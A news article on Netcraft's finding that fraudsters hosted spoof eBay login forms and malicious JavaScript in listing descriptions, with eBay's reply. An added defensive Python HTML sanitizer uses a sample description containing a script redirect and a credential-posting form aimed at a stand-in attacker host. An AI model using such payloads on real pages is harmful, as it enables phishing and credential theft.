Fraudsters are targeting eBay sellers right on eBay’s own website, according to Netcraft.
The security firm published a screenshot of a page on eBay that fraudsters used in an attempt to steal eBay usernames and passwords from unsuspecting users. “The convincing appearance of the spoof login form is bolstered by the fact that it is hosted on a genuine eBay domain, ebaydesc.com. This domain is ordinarily used to host descriptions for eBay listings which are displayed within iframes on eBay listing pages.”
Netcraft says the scam is so well executed that victims may never realize their credentials were sent to a scammer’s site and stolen.
Netcraft was critical of eBay’s practices, which it says allow anyone to insert arbitrary HTML and malicious scripts into a listing’s description, “particularly as this weakness has been exploited to carry out similar attacks against eBay users in the past.”
It pointed to incidents it reported last year in which fraudsters allegedly injected malicious JavaScript into eBay listings to set up man-in-the-middle attacks against car buyers, “and similar JavaScript redirection techniques have continued to be exploited throughout 2015,” it said.
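The weakness Netcraft describes is seller-supplied description HTML being rendered as-is on a genuine domain, so a spoof login form or a script inside it looks legitimate. The allowlist sanitizer below is an added example (not eBay’s or Netcraft’s code, and it assumes nothing about eBay’s actual rendering pipeline) showing the defensive approach: a constructed description containing a fake login form, a script, an inline event handler and a `javascript:` link is rebuilt from permitted tags and attributes only.

```python
import html
from html.parser import HTMLParser

# Constructed sample: a listing description carrying a spoof login form, a script and inline handlers.
SAMPLE_DESCRIPTION = (
    '<p>Great item, ships fast!</p>'
    '<script>location="http://attacker.invalid/steal"</script>'
    '<form action="http://attacker.invalid/login" method="post">'
    '<input name="user"><input name="pass" type="password"></form>'
    '<img src="x" onerror="alert(1)"><a href="javascript:void(0)">click</a><b>Bold text</b>'
)

ALLOWED_TAGS = {"p", "b", "i", "u", "br", "ul", "ol", "li", "img", "a"}
ALLOWED_ATTRS = {"img": {"src", "alt"}, "a": {"href"}}   # no on* handlers anywhere
DROP_WITH_CONTENT = {"script", "style", "form", "iframe", "object", "embed"}  # tag and body removed
VOID_TAGS = {"br", "img"}

def safe_url(url):
    # Allow http(s) and relative URLs; reject javascript:, data: and any other scheme.
    u = url.strip().lower()
    return u.startswith(("http://", "https://")) or ":" not in u

class DescriptionSanitizer(HTMLParser):
    """Allowlist sanitizer: rebuilds the description from permitted tags/attributes only."""
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out, self.skip = [], 0

    def handle_starttag(self, tag, attrs):
        if tag in DROP_WITH_CONTENT:
            self.skip += 1          # everything until the matching end tag is discarded
        elif not self.skip and tag in ALLOWED_TAGS:
            kept = [f' {n}="{html.escape(v, quote=True)}"' for n, v in attrs
                    if n in ALLOWED_ATTRS.get(tag, ()) and v is not None
                    and (n not in ("href", "src") or safe_url(v))]
            self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if tag in DROP_WITH_CONTENT:
            self.skip = max(0, self.skip - 1)
        elif not self.skip and tag in ALLOWED_TAGS and tag not in VOID_TAGS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self.skip:
            self.out.append(html.escape(data, quote=False))  # text is re-escaped, never trusted

def sanitize_description(raw):
    p = DescriptionSanitizer()
    p.feed(raw)
    p.close()
    return "".join(p.out)
```

Running `sanitize_description(SAMPLE_DESCRIPTION)` keeps the paragraph, image, link text and bold text and drops the form, script, `onerror` handler and `javascript:` href.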
We asked eBay to provide a comment on the Netcraft report and what users could do to protect themselves from phishing attacks on its website.
eBay spokesperson Ryan Moore emailed the following response: “As a company, we’re committed to providing a safe and secure marketplace for our millions of customers around the world. We take reported security issues very seriously, and work quickly to evaluate them within the context of our entire security infrastructure.
“We’re aware of this particular issue, which involves fraudsters attempting to phish customers using malicious code in very limited use cases. This type of scheme is extremely rare on our platform, as is malicious user-generated content in general.
“We’re continuously adapting our security systems as we become aware of new forms of malicious code, as well as taking the necessary steps to prevent such phishing attempts.”